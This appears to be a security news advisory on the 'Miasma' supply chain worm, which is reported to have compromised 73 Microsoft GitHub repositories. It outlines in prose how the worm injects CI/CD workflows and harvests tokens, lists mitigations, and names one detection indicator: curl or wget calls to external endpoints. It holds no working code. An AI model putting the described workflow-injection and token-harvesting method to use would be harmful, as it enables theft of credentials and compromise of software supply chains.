The Miasma self-replicating supply chain attack campaign has claimed its largest target yet: 73 Microsoft GitHub repositories spanning four of the company's primary GitHub organizations. The incident, reported by OpenS (a supply chain security firm) and covered by The Hacker News, represents a significant escalation in the scope of an attack pattern that has been spreading through the open-source ecosystem for weeks.
What Is Miasma?
Miasma is a self-replicating supply chain worm designed to propagate through GitHub and package registry ecosystems. Unlike targeted attacks that require manual operator intervention at each step, Miasma automates its spread by:
- Gaining access to a repository with write permissions (typically via a stolen or compromised token)
- Injecting malicious CI/CD workflow modifications or package manifest changes
- Using the newly compromised repository's secrets and tokens to propagate to connected repositories and package registries
- Establishing persistent credential-stealing payloads that continue to harvest tokens over time
The worm's self-replicating nature means that once it gains a foothold in a connected ecosystem, its blast radius expands without additional attacker intervention.
The Microsoft Incident
According to the report, Miasma successfully compromised 73 repositories across four Microsoft GitHub organizations:
| Organization | Nature of Repositories |
|---|---|
| Azure | Core Azure platform SDKs and tooling |
| Azure-Samples | Sample applications and quickstarts |
| Microsoft | Cross-product repositories |
| MicrosoftDocs | Documentation and content repositories |
The repositories affected span a range of criticality. While MicrosoftDocs repositories primarily contain documentation content, Azure and Azure-Samples repositories can include SDK code, deployment templates, and infrastructure-as-code that downstream developers pull directly into their projects.
How It Spread to Microsoft
The attack path that allowed Miasma to reach Microsoft's repositories follows the same pattern seen in earlier campaign stages. The worm previously compromised repositories in the open-source ecosystem — including packages like TanStack (a widely used React data-fetching library) — and harvested CI/CD tokens that had cross-repository or cross-organization write access.
Developers at large organizations routinely work across both personal, open-source, and company repositories using shared credentials or personal access tokens. When a token with broad write scope is present in a compromised repository's secrets, Miasma can use it to extend its reach into the associated organization's other repositories.
Scope and Impact Assessment
Microsoft's security team and GitHub's security organization confirmed the incident and have been working to contain the spread. Key details:
- 73 repositories confirmed compromised across four organizations
- Malicious workflow modifications were the primary injection mechanism
- Token harvesting payloads were introduced to harvest secrets from future CI/CD runs
- Microsoft confirmed that customer data was unaffected in initial statements, though investigations are ongoing for any downstream impact on consumers of the affected packages or documentation
The Azure-Samples organization warrants particular attention. Sample code repositories are often used directly by developers bootstrapping new projects. If malicious code persists in sample repositories before detection and remediation, it can propagate into production systems far removed from the original compromise.
Broader Campaign Context
This Microsoft incident is part of a sustained and expanding campaign. The Miasma worm has previously been linked to attacks on:
- TanStack (npm packages used by OpenAI employees, forcing macOS security updates)
- Grafana (source code exfiltration via stolen GitHub tokens)
- Checkmarx supply chain tooling
- Numerous npm, PyPI, and RubyGems packages across the broader open-source ecosystem
The campaign has demonstrated a sophisticated understanding of how development environments interconnect — particularly the trust relationships between personal GitHub accounts, organizational repositories, and CI/CD pipelines.
Mitigations and Recommended Actions
For organizations using Microsoft's affected GitHub repositories:
Immediate Actions
- Audit your CI/CD pipeline for any workflows that pull from the affected Microsoft organizations (Azure, Azure-Samples, Microsoft, MicrosoftDocs). Pin workflow references to specific commit SHAs rather than branch names or tags.
- Review your GitHub token permissions — rotate any tokens that have write access to multiple organizations, and scope tokens to the minimum required permissions.
- Check for unexpected workflow changes in your own repositories. Miasma's signature includes modifications to
.github/workflows/YAML files.
Medium-Term Hardening
- Implement required reviews for workflow changes via GitHub branch protection rules.
- Enable secret scanning and push protection on all repositories to block accidental token exposure.
- Adopt a token rotation policy — long-lived tokens with broad scope are a primary attack vector for supply chain worms like Miasma.
- Use GitHub's dependency graph and Dependabot alerts to identify direct dependencies on affected packages.
For Enterprise Teams
Organizations with Azure deployments or developer toolchains built on Azure SDKs should:
- Cross-reference their dependency trees against the list of 73 affected repositories once Microsoft publishes the full disclosure
- Audit recently pulled or cached versions of Azure SDK packages in internal artifact registries
- Monitor for unexpected outbound connections or token usage in build pipelines
Detection Indicators
Security teams monitoring for Miasma-related activity should look for:
- Unexpected modifications to
.github/workflows/files, particularly additions ofcurlorwgetcalls to external endpoints - New or modified
package.json,requirements.txt, orgo.modfiles adding unfamiliar dependencies - GitHub Actions logs showing unexpected token usage or cross-repository API calls
- Outbound HTTPS connections from CI runners to domains not previously seen in your baseline